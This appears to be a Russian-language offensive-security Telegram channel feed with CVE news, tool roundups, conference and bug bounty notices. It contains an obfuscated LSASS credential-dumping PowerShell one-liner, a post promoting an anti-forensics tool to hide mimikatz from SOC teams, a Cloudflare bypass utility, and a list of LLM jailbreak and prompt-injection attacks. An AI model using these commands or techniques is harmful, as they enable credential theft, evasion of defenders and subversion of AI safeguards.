Похек

25 April 2024 18:04

CVE-2024-2448

RCE в балансировщике LoadMaster, который широко используется в Amazon, Disney, ASOS, и других компаниях.

Ресерч: https://rhinosecuritylabs.com/research/cve-2024-2448-kemp-loadmaster/

Похек

25 April 2024 15:09

🪲 Выложили доклады с BUGS ZONE

1️⃣bi_zone_vk?z=video-187584378_456239230%2Fclub187584378%2Fpl_-187584378_-2">Да кто такой этот ваш триаж?

Независимый исследователь Артем Бельченко провел несколько интервью с вендорами и поделился с нами тем, как проводят триаж в разных компаниях.

2️⃣bi_zone_vk?z=video-187584378_456239231%2Fclub187584378%2Fpl_-187584378_-2">Сила Python в руках багхантера

Независимый исследователь Аркадий Тен рассказал, что делать, если привычных инструментов Burp Suite не хватает для эксплуатации нужной уязвимости, и как эффективно использовать Python для поиска багов.

Смотрите записи, делитесь с друзьями, ждем вас на следующих ивентах :)

Похек

24 April 2024 18:00

Исследование по защищенности мобильных приложений за 2023 год

Итак, наконец-то это случилось!

Мы выпустили отчет по "Оценке защищенности мобильных приложений" за 2023 год!

В прошлом году мы выпустили наше первое исследование защищенности мобильных приложений. На тот момент мы проанализировали порядка 700 приложений. В этом году их количество перевалило за 1800. Приложения из самых разных разных областей, самого разного размера и сложности. Все приложения были проверены при помощи Стингрей в полностью автоматическом режиме.

Что я могу сказать, вместе с числом приложений вырос и наш продукт. Для многих типов уязвимостей мы пересмотрели уровни критичности, добавилась фича с "динамическим" уровнем критичности. То есть, в зависимости от разных факторов одна и таже проблема может быть как высокого, так и низкого уровня. Добавились проверки, много новых категорий, скорость работы и многое другое.

Наверное, все эти факторы повлияли на итоговую цифру, но и не только это) Я уверен, что всё, что мы делаем не зря и приложения действительно стали более защищенными и все больше внимания в компаниях начинают уделять защищенности мобильных приложений.

В прошлом году процент приложений, в которых мы нашли критические и высокие уязвимости составлял 83%, в этом же году он составил всего 56%.

Я хочу выразить огромную благодарность всей команде за ту работу, что была проделана для появления этого масштабного анализа! Спасибо огромное!

И конечно, приятного чтения!

Похек

24 April 2024 11:01

OWASP OFFAT
#owasp #API #fuzzing

OFFensive Api Tester - это инструмент для автоматического тестирования API на основе OpenAPI. Он предоставляет возможность автоматически фаззить входные данные и использовать пользовательские данные во время тестов, заданных через конфигурационный файл YAML.

Что тестирует инструмент:
➡️Restricted HTTP Methods
➡️SQLi
➡️BOLA
➡️Data Exposure
➡️BOPLA / Mass Assignment
➡️Broken Access Control
➡️Basic Command Injection
➡️Basic XSS/HTML Injection test

Установка:

python -m pip install offat

offat -f swagger_file.json

Похек

23 April 2024 11:00

🐭 Cloudflare Bypass
#cloudflare #bypass

Утилита для прохождения проверки Cloudflare. Будет полезно для парсинга, скрапинга, для боевых скриптов, когда сайт на CF и т.д. Автор обновляет репозиторий частенько, так что наиболее вероятно, что обходы будут работать.

Проект написан на Python, а под капотом библиотека DrissionPage.

Установка:

git clone https://github.com/sarperavci/CloudflareBypassForScraping; cd CloudflareBypassForScraping; python3 -m venv venv; source venv/bin/activate; pip3 install -r requirements.txt

python3 cloudflare_bypass.py

Похек

22 April 2024 10:59

⚠️ NoArgs - инструмент анти-форензики и противодействия SOC
#antiforensic #windows

Когда blue team начинают анализировать логи, то им довольно просто определить цепочку наших действий смотря по логам и запущенным процессам. Но нашёл для вас интересную тулзу, которая скрывает аргументы запуска команд.

Как показано в гифке. Сначала мы "парализуем" текущую командную строку, далее запуск mimikatz будет более менее без палева. И если просто переименовать процесс в какой-нибудь excel.exe, то в логах будет виден только запуск Excel якобы. Понятное дело, что AV спалит очевидную нагрузку по куче факторов. Но как анти-форензика и real-time противодействие SOCу, думаю отлично будет. Как будет возможность, обязательно протестирую.

🧩 NoArgs

🌚 @poxek

Похек

20 April 2024 15:01

Kubenomicon

Это база знаний начинающего исследователя, который решил задокументировать способы атаки на Kubernetes. (Ещё есть матрица угроз от Microsoft для Kubernetes, которая ориентирована на защиту системы.)

Для многих новичков проект Kubenomicon может быть полезным, однако стоит помнить, что он все еще находится в очень сыром состоянии. Многое там еще не описано и требует доработки. Кроме того, практически все описания происходят без учета RBAC, что создает ложное представление о простоте. Очевидно, что здесь не хватает описания механизмов, которые могут противодействовать этим атакам, и почему следуя инструкциям не всегда можно достичь желаемого результата.

Ссылка на проект.

LH | Новости | Курсы | Мемы

#рекомендация
#рекомендации

Похек

19 April 2024 15:00

Приглашаем на вторую конференцию по безопасности контейнеров «БеКон» 🥓

Дата: 5 июня 2024
Место: Москва, Loft Hall
Сайт: bekon.luntry.ru

5 июня в Москве компания Luntry проведет вторую конференцию по безопасности контейнерных сред — «БеКон».

Цель мероприятия
Конференция призвана помочь компаниям перейти на новый уровень понимания контейнерной безопасности и адаптировать современные подходы по ее обеспечению.

Прошлогодние итоги БеКон вы можете найти здесь: в обзоре.

Программа 2024
Программа «БеКона 2024» — сочная выборка актуальных докладов от ведущих компаний, использующих контейнеризацию, из различных отраслей. Выступления будут короткими, без рекламы и воды, но пропитанными многолетним практическим опытом.

Приобрести билет можно на официальном сайте конференции.

Похек

19 April 2024 12:46

Obfuscated LSASS dumper command

&$env:???t??r???\*2\r[t-u]???[k-l]?2* $(gi $env:???t??r???\*2\c?m?[v-w]*l | % {
$_.FullName }), `#-999999999999999999999999999999999999999999999999999999999999
999999999999999999999999999999999999999999999999999999999999999999999999999999
999999999999999999999999999999999999999999999999999999999999999999999999999999
99999999999999999976-decoy $(gps l?a*s).id c:\t??p\dmp.log full;

Похек

18 April 2024 17:53

10 лет VK BugBounty
#vk_bb

Поздравляю бывшие Mail.ru Group, а ныне VK со столь знаменательной датой. Ребята начинали с H1, а сейчас являются одной из крупнейших багбаунти программ в РФ!!

Ребята огромные молодцы и я благодарен Петру, что пригласил меня на ивент)

🌚 @poxek

Похек

18 April 2024 10:27

Кайфовая футболка, оверсайз XL/XXL. Крутая полоска на футболке с головоломкой и биркой Y Security Team

Фотка стикеров в чате

Похек

17 April 2024 17:26

Yandex Security Night

Похек

17 April 2024 09:50

✅ Открыт приём заявок на третью по счету Премию «Киберпросвет»

Премия «Киберпросвет» призвана отметить компании и блогеров, принимающих активное участие в освещении актуальных вопросов кибербезопасности, распространении информации о лучших практиках и продуктах обеспечения ИБ как среди профессионального сообщества, так и среди рядовых пользователей.

➡️ Считаете, что вы и/или ваша компания относитесь к ним? Тогда изучите список номинаций, выберите подходящие и направляйте в редакцию Cyber Media заявки на участие.

Сбор заявок до 16.05
Подведение итогов 31.05

Участие в Премии бесплатное.

Похек

16 April 2024 11:17

Подкаст Just Security by Awillix. Личный бренд в ИБ
#подкаст

Помнится мне говорили, что я инфоцыган и журналюга 🐈, так вот с Ромой @package_security решили обсудить эту тему. Выводы были неоднозначные, но точно интересные и отчасти философские. А также мы поговорили про ИБ с точки зрения бизнеса. Как не понимать ничего в ИБ, но стать главным архитекторов и про всеми ненавистный любимый AI в ИБ.

📹 Youtube
💬 VK
🎵 Яндекс Музыка
🎙 Apple podcast
😻 Mave

🌚 @poxek

Похек

15 April 2024 17:49

Standoff 13 Changelog
#standoff13

➡️ Новая инфра, в виде виртуального государства S
➡️ Система кланов для Red Team
➡️ Расширены возможности для Blue team (я от себя лоббировал эту идею)

🌚 @poxek

Похек

25 April 2024 15:12

После доклада Аркадия поднял вопрос о том, что Burpsuite в практически отсутствии конкуренции уже долго стагнирует. Наблюдается всё больше багов и т.д и нет новых фич.

Привел пример Grroxy, на мой взгляд очень интересного аналога Burpsuite. Пока в бете и выборочно дают доступ.

Есть Caido, но он стал платным и бесплатная урезанная версия. А по функционалу пока не дотягивает до бурпа

А какие аналоги Бурпа знаете вы?

Похек

25 April 2024 12:12

🔐Awesome-ml-for-cybersecurity

Хороший репозиторий, где структурировано много информации по этой теме, в том числе и на русском языке.

Например, "Методы интеллектуального анализа данных и обнаружение вторжений (RUS)" и "Нейросетевой подход к иерархическому представлению компьютерной сети в задачах информационной безопасности (RUS)"

🔵

Похек

24 April 2024 14:46

🛡LLM Guardrails

Существуют языковые модели, которые созданы для того, чтобы отвечать на вопросы на определенную тематику.
Например, медицинские вопросы, транспортные, заказы и проч.

В контексте безопасности ИИ, в таких языковых моделях необходимо внедрение LLM Guardrails - специальных ограждений, которые смогут определить границы для ответов таких языковых моделей.

Для чего они нужны?

✅Чтобы убедиться, что языковая модель ведет себя определенным образом, следует структуре ответов, и может задавать дополнительные вопросы.

✅Чтобы гарантировать, что языковая модель не будет себя плохо вести. Включать вредоносную информацию в ответ, отвечать на вопросы не по теме, или задавать неуместные вопросы.


В настоящее время существуют две крупные библиотеки LLM Guardrails:

🖥NVIDIA

🖥GUARDRAILS

Проверьте, не забыли ли вы добавить их в свой проект👧

Похек

23 April 2024 13:42

🆕 С 22 апреля Московская область запускает очередную краткосрочную программу багбаунти на платформе Standoff. Скоуп: zdrav.mosreg.ru

Сервис «Здоровье» заменяет бумажную медицинскую карточку пациента. Через него можно записаться на прием или вызвать врача на дом, посмотреть результаты обследований и записи о прошлых визитах в поликлинику.

До 20 мая присоединяйся к поиску уязвимостей на платформе Standoff и получай заслуженное вознаграждение!

Похек

22 April 2024 20:12

👩‍💻 Attacking NodeJS Application.

- Use flat Promise chains;
- Set request size limits;
- Do not block the event loop;
- Perform input validation;
- Perform output escaping;
- Perform application activity logging;
- Monitor the event loop;
- Take precautions against brute-forcing;
- Use Anti-CSRF tokens;
- Prevent HTTP Parameter Pollution;
- Do not use dangerous functions;
- Use appropriate security headers;
- Listen to errors when using EventEmitter;
- Set cookie flags appropriately;
- Avoid eval(), setTimeout(), and setInterval();
- Avoid new Function();
- Avoid code serialization in JavaScript;
- Use a Node.js security linter;
- References.

#devsecops

Похек

21 April 2024 10:14

Занимательная история про Kerberoasting от имени пользователя с отключённой преаутентификацией без знания его пароля.
Я раньше неоднократно задавался таким же вопросом, но смущало то, что без сессионного ключа осуществить атаку казалось невозможным. Однако мир Kerberos и AD удивителен🖼️

Синие команды уже настраивают детекты на странный sname в AS-REQ?

Похек

20 April 2024 14:52

Недавно обсуждали, что мало молодых ребят, кто уже бы багхантил, что-то где-то выигрывал. Я назвал сразу несколько имён, но ситуация однозначна. Ребята, кто в 15 уже могут похекать госуслуги или Тинькофф, это уникумы.

А я лично стараюсь, чтобы таких ребят становилось больше и больше.

Поетому данный пост посвящается Ильдару @sypso. Он выиграл ВСОШ, Всероссийская олимпиада школьников. Я смотрел эфир, примерно понимаю какие там были проекты. Из такого, ребята переизобретали badusb, ещё какие-то штуки. Но вот лично для себя концептуально новых идей не видел. А Ильдар сделал настолько крутой проект, что он может пригодится и для red team, и для malw аналитиков, и для всех интересующихся питоном.

Так что, официально, поздравляю Ильдара с его заслуженной ПОБЕДОЙ на ВСОШ. Красавчик, личный респект от меня! 😎❤️

Я надеюсь данная история замотивирует не только его двигаться дальше, но и других молодых ребят. Ведь вы наши будущее, а мы поможем вам развиться и избежать наших ошибок)

🌚 @poxek

Похек

19 April 2024 13:54

От @wearetyomsmnv

#meme

Похек

18 April 2024 21:01

Багхантерский афтерпати
#vk_bb

Похек

18 April 2024 17:16

https://github.com/prompt-security/ps-fuzz

Интересный фаззер для LLM, который имеет поддержку огромного количества моделей (есть даже поддержка GigaChat и YaGPT !!!! ). Он проводит фаззинг-тестирование и пытается определить возможно ли реализовать jailbreak и prompt-injection уязвимости:

Это список атак, которые он пытается реализовать:

Jailbreak:

AIM Jailbreak
Affirmative Suffix
Amnesia
Contextual Redirection
Do Anything Now Jailbreak (DAN)
Harmful Behavior
Linguistic Evasion
Self Refine
UCAR
Base64 Evasion

Prompt Injection:

Authoritative Role Impersonation
Complimentary Transition
Ethical Compliance
Typoglycemia Attack

System prompt extraction:

System Prompt Stealer

Похек

17 April 2024 22:41

Yandex Welcome pack Security Night
#yandex

🌚 @poxek

Похек

17 April 2024 09:50

В прошлом году победил в одной из номинаций. В этот раз тоже буду участвовать, но в другой номинации

Похек

16 April 2024 15:02

КАК ВЗЛОМАТЬ КОМПАНИЮ? // ПРОЕКТ ПО ФИЗИЧЕСКОЙ КИБЕРАТАКЕ

Есть у меня хороший знакомый, Егор Зайцев @r00t_owl. Статный мужчина, так ещё и Директор департамента противодействия киберугрозам в «Информзащите». До знакомства с ним у меня было спорное отношение к Информзащите. Но узнав, что у них есть настолько крутой отдел red team'а и противодействия киберугрозам. Впервые мы с ним познакомились на Awillix Pentest Award, который кстати пройдет в этом году тоже и будет расширен.

Одну из историй, которую он рассказывал на своём канале, про то, как они с bodycam проводили red team и заказчик в записи потом смотрел фильм, про то как их же ломали. Там куча историй, как они проникали на казалось бы защищенный объекты, похекали АСУТП и т.д. Тот самый романтизм ИБ, только в профессиональном измерении) Максимально рекомендую зайти почитать и заодно подписаться 🐈

Так в итоге, мы шутили про фильм, шутили и вот дошутились))
Ребята буквально сняли нарезку того, как у них проходит реальный проект

📹 https://www.youtube.com/watch?v=1N5WyC1qwtI 📹

➡️ Подписывайтесь! @pro_pentest

🌚 @poxek

Похек

15 April 2024 17:50

Что случилось с Codeby? Они сделали ренейминг в DreamTeam. Так что не теряйтесь)

Codeby = DreamTeam

p.s. почему? зачем? не знаю

🌚 @poxek

Похек

15 April 2024 17:38

STANDOFF 13
#standoff13

Главная кибербитва страны, которую нельзя пропустить

Дата: 22–25 МАЯ 2024

Место: Москва, «ЛУЖНИКИ»

Какие красные команды будут на Standoff 13

⭐️По результатам Standoff 12

1 - DreamTeam
2 - True0xA3
3 - RHTxF13xSHD
4 - Cult
5 - Jet_infosystems
6 - Wetox
7 - DeteAct x SPbCTF
8 - TSARKA
9 - Kibers
10 - GISCYBERTEAM
11 - EvilBunnyWrote

1 - cR4.sh
2 - only_f4st
3 - Radiant0x2A
4 - 5HM3L
5 - MG.RT
6 - Data
7 - Crypto Apes
8 - Wardagen
9 - SecWare
13 - Baguette2Pain
14 - Invuls
17 - T.H.R.E.A.T
18 - 4ak4ak

1 - Pr1m3d
2 - Bulba_Hackers